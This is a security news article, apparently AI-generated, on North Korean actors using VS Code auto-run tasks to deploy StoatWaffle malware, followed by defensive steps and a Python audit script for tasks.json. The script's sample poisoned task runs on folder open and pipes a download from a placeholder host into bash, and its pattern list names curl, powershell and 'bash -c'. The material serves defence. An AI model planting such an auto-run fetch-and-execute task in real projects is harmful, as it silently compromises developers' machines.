North Korean Hackers Abuse VS Code Auto-Run Tasks to Deploy StoatWaffle Malware

North Korean threat actors are exploiting VS Code auto-run tasks to silently deploy StoatWaffle malware. Here's what happened and how to protect your dev environment.

March 23, 2026 | VibeShield News Agent | thehackernews.com

Editorial note: This article was generated by VibeShield's AI news agent based on the original report. It has been reviewed for accuracy but may contain AI-generated summaries. Always verify critical details from the original source.

North Korean Hackers Are Weaponizing Your Code Editor

Your IDE is now a threat vector. North Korean state-sponsored threat actors have been caught abusing VS Code's auto-run task feature to silently drop StoatWaffle malware onto developer machines - turning one of the most trusted tools in your stack into an entry point for a nation-state attack.

What Happened

VS Code supports .vscode/tasks.json files, which can define tasks that execute automatically when a workspace is opened. Attackers are embedding malicious auto-run task configurations inside poisoned repositories and project archives. When an unsuspecting developer opens the project, VS Code fires off the task - no prompt, no warning, no user interaction required.

The payload in question is StoatWaffle, a stealthy loader malware linked to North Korean threat clusters. Once deployed, it:

  • Establishes persistence on the compromised machine
  • Phones home to attacker-controlled infrastructure
  • Drops secondary payloads for credential harvesting and lateral movement
  • Targets developer environments specifically - meaning source code, tokens, and cloud credentials are all at risk

This campaign fits a well-documented North Korean playbook: infiltrate developer pipelines, compromise upstream tooling, and use trusted workflows as cover.

Why This Works So Well

Developers trust their tools. A tasks.json file looks completely routine inside a project directory. Most engineers never audit workspace configuration files before opening a repo - and VS Code's auto-run behavior makes that oversight immediately dangerous.

The attack scales easily through fake job offers, open source contributions, and trojanized code samples - all proven delivery mechanisms used by groups like Lazarus and its sub-clusters.

How to Lock This Down

Protect your local environment with these concrete steps:

  • Audit every .vscode/tasks.json before opening unfamiliar repos - treat it like executable code, because it is
  • Disable automatic task running in VS Code: set "task.allowAutomaticTasks": "off" in your user settings
  • Use Workspace Trust: VS Code's built-in Restricted Mode blocks auto-run tasks in untrusted workspaces, so keep it enabled by default
  • Scan cloned repos for suspicious task definitions, especially those invoking curl, powershell, bash -c, or encoded commands
  • Rotate credentials immediately if you opened an untrusted workspace without these protections in place
  • Treat .vscode/ as attack surface in your threat model - not just a convenience folder
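As an added example (not code from the article, from the original report, or from VibeShield), a small Python audit helper for the "scan cloned repos" step above: it parses a tasks.json, flags tasks that fire on folder open via the documented runOptions.runOn trigger, and flags tasks whose command line contains the fragments named above. The sample tasks.json is constructed for illustration and its URL is a placeholder.

```python
# Added audit helper (not from the article): flag tasks.json entries that run on
# folder open or invoke the commands the article names. tasks.json is JSONC, so
# comments and trailing commas are stripped with a best-effort pass first.
import json
import re

SUSPICIOUS = [r"\bcurl\b", r"\bwget\b", r"\bpowershell\b", r"\bpwsh\b",
              r"\bbash\s+-c\b", r"\bsh\s+-c\b", r"-EncodedCommand\b",
              r"\bbase64\b", r"\biex\b", r"Invoke-Expression"]

def strip_jsonc(text: str) -> str:
    """Drop /* */ and full-line // comments and trailing commas (best effort)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return re.sub(r",(\s*[}\]])", r"\1", text)

def task_command_text(task: dict) -> str:
    """Join command and args, including per-OS overrides, into one string."""
    parts = [task.get("command", ""), *task.get("args", [])]
    for spec in (task.get(k) or {} for k in ("windows", "linux", "osx")):
        parts += [spec.get("command", ""), *spec.get("args", [])]
    return " ".join(str(p) for p in parts if p)

def audit_tasks(tasks_json: str) -> list[dict]:
    """Return one finding per task that auto-runs or matches SUSPICIOUS."""
    findings = []
    for task in json.loads(strip_jsonc(tasks_json)).get("tasks", []):
        auto = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        cmd = task_command_text(task)
        hits = [p for p in SUSPICIOUS if re.search(p, cmd, re.I)]
        if auto or hits:
            findings.append({"label": task.get("label", "<unnamed>"),
                             "auto_run": auto, "suspicious": hits, "command": cmd})
    return findings

# Constructed sample of a poisoned workspace file; the URL is a placeholder.
SAMPLE_TASKS_JSON = r'''{
  // looks like a routine build task, but fires on folder open
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "bash",
     "args": ["-c", "curl -fsSL https://example.invalid/setup.sh | bash"],
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "test", "type": "shell", "command": "npm test"},
  ]
}'''

if __name__ == "__main__":
    for finding in audit_tasks(SAMPLE_TASKS_JSON):
        print(finding)
```

Run it against .vscode/tasks.json in a freshly cloned repo before opening the folder in VS Code; any finding with auto_run set is a task the editor would launch without you invoking it.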

Your editor config is code. Review it like code.
